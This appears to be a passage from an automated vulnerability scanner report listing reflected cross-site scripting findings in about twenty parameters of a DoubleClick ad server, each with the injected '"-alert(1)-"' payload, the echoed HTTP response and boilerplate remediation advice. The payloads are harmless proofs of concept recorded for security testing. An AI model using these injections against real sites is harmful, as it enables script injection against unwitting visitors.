<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com562b5"-alert(1)-"2c378b10046&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_med ...[SNIP]...
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae52"-alert(1)-"3dcf514d1d0 was submitted in the pg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:12:48 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFIfae52"-alert(1)-"3dcf514d1d0&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false;
The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab0ff"-alert(1)-"2a6292d3f6b was submitted in the pid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:08:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 1242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=ab0ff"-alert(1)-"2a6292d3f6b&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.2 ...[SNIP]...
The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68308"-alert(1)-"d64be5ea104 was submitted in the pp parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:34 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=10068308"-alert(1)-"d64be5ea104&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/htt ...[SNIP]...
The value of the ppartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1876d"-alert(1)-"160f9d82a0c was submitted in the ppartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:11:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... /adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=1876d"-alert(1)-"160f9d82a0c&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295. ...[SNIP]...
The value of the pt request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b3ce1"-alert(1)-"791190644da was submitted in the pt parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:06:54 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 16c/%2a/j%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301b3ce1"-alert(1)-"791190644da&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI& ...[SNIP]...
The value of the ra request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d649"-alert(1)-"cfdd3f5d6a4 was submitted in the ra parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:12:29 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... =2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.181d649"-alert(1)-"cfdd3f5d6a4&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fs ...[SNIP]...
The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 589a1"-alert(1)-"fe600fcd18e was submitted in the rqid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:11 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 7757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4589a1"-alert(1)-"fe600fcd18e&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH& ...[SNIP]...
The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c01f"-alert(1)-"1e1ca44f3c0 was submitted in the sg parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=4766227c01f"-alert(1)-"1e1ca44f3c0&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmo ...[SNIP]...
The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eda0f"-alert(1)-"fa66ca5b726 was submitted in the site parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:06:26 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3eda0f"-alert(1)-"fa66ca5b726&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqd ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e17b0"-alert(1)-"23356903145 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:03:38 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]...
var url = escape("http://ad.vulnerable.ad.partner/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023e17b0"-alert(1)-"23356903145&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90ad4"-alert(1)-"77acc02db13 was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:13:08 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6820
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.2090ad4"-alert(1)-"77acc02db13&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7524b"-alert(1)-"e973f58c800 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:06 GMT Expires: Mon, 22 Nov 2010 00:10:06 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7063
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... /click%3Bh%3Dv8/3a5a/17/14a/%2a/g%3B231155693%3B0-0%3B0%3B54795159%3B4307-300/250%3B36901567/36919445/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=27524b"-alert(1)-"e973f58c800&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11 ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81642"-alert(1)-"7b5e5f069a0 was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:07:12 GMT Expires: Mon, 22 Nov 2010 00:12:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6715
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri ...[SNIP]... 93%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=19248781642"-alert(1)-"7b5e5f069a0&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/vr ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e518"-alert(1)-"dd64696a94d was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:53 GMT Expires: Mon, 22 Nov 2010 00:15:53 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7163
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Wed ...[SNIP]... log/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=3e518"-alert(1)-"dd64696a94d&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/innovation/us/smarterplanet/index.shtml?url=midsized_business/solutions/informationprotection&cmp=usmmb& ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 770c4"-alert(1)-"c8ab4cf7ab6 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:42 GMT Expires: Mon, 22 Nov 2010 00:15:42 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7028
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... .com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=770c4"-alert(1)-"c8ab4cf7ab6&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/information-analytics.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr= ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cfb33"-alert(1)-"b08b2fbdfeb was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:09:13 GMT Expires: Mon, 22 Nov 2010 00:14:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6715
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri ...[SNIP]... B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=cfb33"-alert(1)-"b08b2fbdfeb&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/vrm/pref/263 ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 24bbb"-alert(1)-"7c6d580aa85 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:10:03 GMT Expires: Mon, 22 Nov 2010 00:15:03 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7119
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Mon ...[SNIP]... Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=24bbb"-alert(1)-"7c6d580aa85&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=58/http://www.ibm.com/systems/smarter/questions/security-resiliency.html?cmp=blank&cm=b&csr= ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 290b3"-alert(1)-"70e6e14f3b9 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 7025 Cache-Control: no-cache Pragma: no-cache Date: Mon, 22 Nov 2010 00:11:35 GMT Expires: Mon, 22 Nov 2010 00:16:35 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21.21.36.46&event=290b3"-alert(1)-"70e6e14f3b9http://www.ibm.com/systems/smarter/questions/process-transformation.html?cmp=blank&cm=b&csr=agus_itquest-20100521&cr=zdnet&ct=108AU0QW&cn=telecom"); var fscUrl = url; var fscUrlClickTagFound = false; v ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cbfb"-alert(1)-"835e9647437 was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:04:36 GMT Expires: Mon, 22 Nov 2010 00:09:36 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7119
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Thu ...[SNIP]... ick.net/click%3Bh%3Dv8/3a5a/17/14a/%2a/t%3B231155693%3B2-0%3B0%3B54795159%3B4307-300/250%3B37853710/37871528/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn3cbfb"-alert(1)-"835e9647437&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t= ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ddc4f"-alert(1)-"72623d3e15c was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:05:20 GMT Expires: Mon, 22 Nov 2010 00:10:20 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 6715
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri ...[SNIP]... ick%3Bh%3Dv8/3a5a/17/14a/%2a/z%3B231155693%3B5-0%3B0%3B54795159%3B4307-300/250%3B38460446/38478203/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8041&sg=467335&o=6037%253A13616%253A&h=cn&p=&b=2&l=ddc4f"-alert(1)-"72623d3e15c&site=2&pt=2100&nd=13616&pid=&cid=192487&pp=100&e=&rqid=01c13-ad-e3:4CE9721422D66B&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=174.121.222.18&pg=768cjwoPOUoAAAE23ycAAAAE&t=2010.11.21 ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7295"-alert(1)-"6e36561f977 was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Mon, 22 Nov 2010 00:06:12 GMT Expires: Mon, 22 Nov 2010 00:11:12 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 7037
